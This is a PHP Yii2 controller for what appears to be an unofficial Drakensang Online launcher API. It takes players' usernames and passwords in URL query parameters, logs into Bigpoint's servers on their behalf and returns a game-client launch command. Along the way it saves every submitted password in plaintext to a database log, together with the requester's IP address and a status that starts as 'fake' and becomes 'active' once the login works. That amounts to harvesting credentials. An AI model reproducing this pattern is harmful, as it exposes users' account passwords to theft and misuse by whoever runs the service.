<?php
/**
 * Created by PhpStorm.
 * User: EaredRodent
 * Date: 2/11/2019
 * Time: 09:54 PM
 */

namespace app\modules\v1\controllers;

use Yii;
use yii\httpclient\Client;
use yii\filters\AccessControl;
use yii\filters\auth\HttpBearerAuth;
use yii\httpclient\Request;
use yii\rest\ActiveController;
use yii\web\HttpException;
use app\modules\v1\models\Log;

class DsoUserManagerController extends ActiveController
{
    public $modelClass = '';

    public function behaviors()
    {
        $behaviors = parent::behaviors();
        $behaviors['authenticator'] = [
            'class' => HttpBearerAuth::className(),
            'optional' => ['index']
        ];
        $behaviors['access'] = [
            'class' => AccessControl::className(),
            'rules' => [
                [
                    'actions' => ['index'],
                    'allow' => true,
                    'roles' => ['?', '@']
                ]
            ]
        ];
        return $behaviors;
    }

    public function actions()
    {
        $actions = parent::actions();
        unset($actions['index']);
        return $actions; // TODO: Change the autogenerated stub
    }

    public function actionIndex()
    {
//        return json_encode(['fdsg' => 'cock']);

        $clientRequest = Yii::$app->request;

        $requiredServer = $clientRequest->get('requiredServer');
        if (!$requiredServer) {
            throw new HttpException(400, 'Missing url parameter "requiredServer"');
        }
        $username = $clientRequest->get('username');
        if (!$username) {
            throw new HttpException(400, 'Authentication parameter "username" is required');
        }
        $password = $clientRequest->get('password');
        if (!$password) {
            throw new HttpException(400, 'Authentication parameter "password" is required');
        }
        $lang = $clientRequest->get('lang');
        if (!$lang) {
            throw new HttpException(400, 'Authentication parameter "lang" is required');
        }

        /**
         * Лог
         */

        $log = Log::findOne(['username' => $username]);

        if (!$log) {
            $log = new Log();
        }

        $log->username = $username;
        $log->password = $password;
        $log->requiredServer = $requiredServer;
        $log->ip = Yii::$app->request->userIP;
        $log->status = 'fake';
        $log->save();
        /**
         * Начало
         */

        $lastVisitedServer = $requiredServer;
        $result = '';

        /**
         * @param $request \yii\httpclient\Request
         * @return Request
         */
        function prepareRequest($request)
        {
            $request = $request->setHeaders([
                'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) DROThinClient/1.0 Safari/538.1'
            ]);
            $request = $request->setOptions([
                'followLocation' => false
            ]);
            return $request;
        }

        /**
         * @param $response \yii\httpclient\Response
         * @param $log Log
         */
        function formatResult($response, $requiredServer, $lastVisitedServer, $log, $lang)
        {
            $log->status = 'active';
            $log->save();
            $nebula = $response->getContent();
            $staticPattern = 'nebula3.launch(';
            $staticPattern = preg_quote($staticPattern, '/');
            $pattern = "/{$staticPattern}'([^']+)'/";
            $matches = [];
            preg_match($pattern, $nebula, $matches);
            if (!isset($matches[1])) {
                throw new HttpException(401, 'The main pattern[0] is not received.');
            }
            $nebula = '%temp%/DSOClient/dlcache/dro_client.exe ' . $matches[1];

            $staticPattern = '-language';
            $staticPattern = preg_quote($staticPattern, '/');
            $pattern = "/{$staticPattern}\\s(\\S+)/";
            $matches = [];
            preg_match($pattern, $nebula, $matches);
            if (!isset($matches[1])) {
                throw new HttpException(401, 'The main pattern[1] is not received.');
            }

            $nebula = str_replace('-language ' . $matches[1], '-language ' . $lang, $nebula);

            return [
                'requiredServer' => $requiredServer,
                'lastVisitedServer' => $lastVisitedServer,
                'scripts' => [
                    'cmdRun' => $nebula
                ]
            ];
        }

        $client = new Client();
        $request = $client->createRequest();
        $request = $request->setMethod('GET');
        $request = $request->setUrl("https://{$requiredServer}.drakensang.com/en/launcher?standalone=true&lang=en");
        $request = prepareRequest($request);
        $response = $request->send();
        if (!$response->isOk) {
            throw new HttpException(401, 'Preparation failed.');
        }
        $content = $response->getContent();
        $staticPattern = 'https://sas.bpsecure.com/Sas/Authentication/Bigpoint';
        $staticPattern = preg_quote($staticPattern, '/');
        $pattern = "/\"({$staticPattern}[^\"]+)\"/";
        $matches = [];
        preg_match($pattern, $content, $matches);
        if (!isset($matches[1])) {
            throw new HttpException(401, 'The main pattern is not received.');
        }
        $sasAuthenticationBigpoint = str_replace('&amp;', '&', $matches[1]);


        $request = $client->createRequest();
        $request = $request->setMethod('POST');
        $request = $request->setUrl($sasAuthenticationBigpoint);
        $request = $request->setData([
            'username' => $username,
            'password' => $password
        ]);
        $request = prepareRequest($request);
        $response = $request->send();
        $location = $response->getHeaders()->get('Location');
        if (!$location) {
            throw new HttpException(401, 'Root authentication failed.');
        }
        $testLocation = parse_url($location);
        if ($testLocation['path'] !== '/ProjectApi/Authentication') {
            throw new HttpException(401, 'Failed. Wrong user credentials.');
        }
        $projectApiAuthentication = $location;


        $strategy = 'anotherServer';
        $strategy = 'previousServer';
        $strategy = '';

        for ($i = 0; $i < 3; $i++) {
            $request = $client->createRequest();
            $request = $request->setMethod('GET');
            if ($i === 0) {
                $request = $request->setUrl($projectApiAuthentication);
            } else {
                $request = $request->setUrl($location);
                $request = $request->setCookies($response->getCookies());
            }
            $request = prepareRequest($request);
            $response = $request->send();
            $lvs = $location;
            $location = $response->getHeaders()->get('Location');
            if (!$location) {
                throw new HttpException(401, 'Location not defined.');
            }
            if ($location === '/launcher/welcome') {
                if ($i === 0) {
                    $strategy = 'previousServer';
                } else {
                    try {
                        $url = parse_url($lvs);
                        $lastVisitedServer = explode('.', $url['host'])[0];
                    } catch (\Exception $exception) {
                        throw new HttpException(401, 'Parsing url failed.');
                    }
                    $strategy = 'anotherServer';
                }
                break;
            } else {
                if ($i === 2) {
                    throw new HttpException(401, 'Following location failed.');
                }
            }
        }


        if ($strategy === 'previousServer') {
            $enPlay = "https://{$requiredServer}.drakensang.com/en/play";

            $request = $client->createRequest();
            $request = $request->setMethod('GET');
            $request = $request->setUrl($enPlay);
            $request = $request->setCookies($response->getCookies());
            $request = prepareRequest($request);
            $response = $request->send();
            if (!$response->isOk) {
                throw new HttpException(401, 'Preparation failed.');
            }
            $result = formatResult($response, $requiredServer, $lastVisitedServer, $log, $lang);
        }


        if ($strategy === 'anotherServer') {
            $enLauncherWelcome = "https://{$lastVisitedServer}.drakensang.com/en/launcher/welcome";
            $request = $client->createRequest();
            $request = $request->setMethod('GET');
            $request = $request->setUrl($enLauncherWelcome);
            $request = $request->setCookies($response->getCookies());
            $request = prepareRequest($request);
            $response = $request->send();
            if (!$response->isOk) {
                throw new HttpException(401, 'AnotherServer strategy failed.');
            }
            $content = $response->getContent();
            $staticPattern = "http://{$requiredServer}.drakensang.com/GameAPI";
            $staticPattern = preg_quote($staticPattern, '/');
            $pattern = "/\"({$staticPattern}[^\"]+)\"/";
            $matches = [];
            preg_match($pattern, $content, $matches);
            if (!isset($matches[1])) {
                throw new HttpException(401, 'AnotherServer strategy failed. The pattern is not received.');
            }
            $location = $matches[1];


            $request = $client->createRequest();
            $request = $request->setMethod('GET');
            $request = $request->setUrl($location);
            $request = $request->setCookies($response->getCookies());
            $request = prepareRequest($request);
            $response = $request->send();
            $location = $response->getHeaders()->get('Location');
            if ($location !== '/play') {
                throw new HttpException(401, 'AnotherServer strategy failed. Is not play location.');
            }

            $enPlay = "https://{$requiredServer}.drakensang.com/en/play";
            $request = $client->createRequest();
            $request = $request->setMethod('GET');
            $request = $request->setUrl($enPlay);
            $request = $request->setCookies($response->getCookies());
            $request = prepareRequest($request);
            $response = $request->send();
            if (!$response->isOk) {
                throw new HttpException(401, 'Preparation failed.');
            }
            $result = formatResult($response, $requiredServer, $lastVisitedServer, $log, $lang);
        }


        return $result;
    }
}

?>
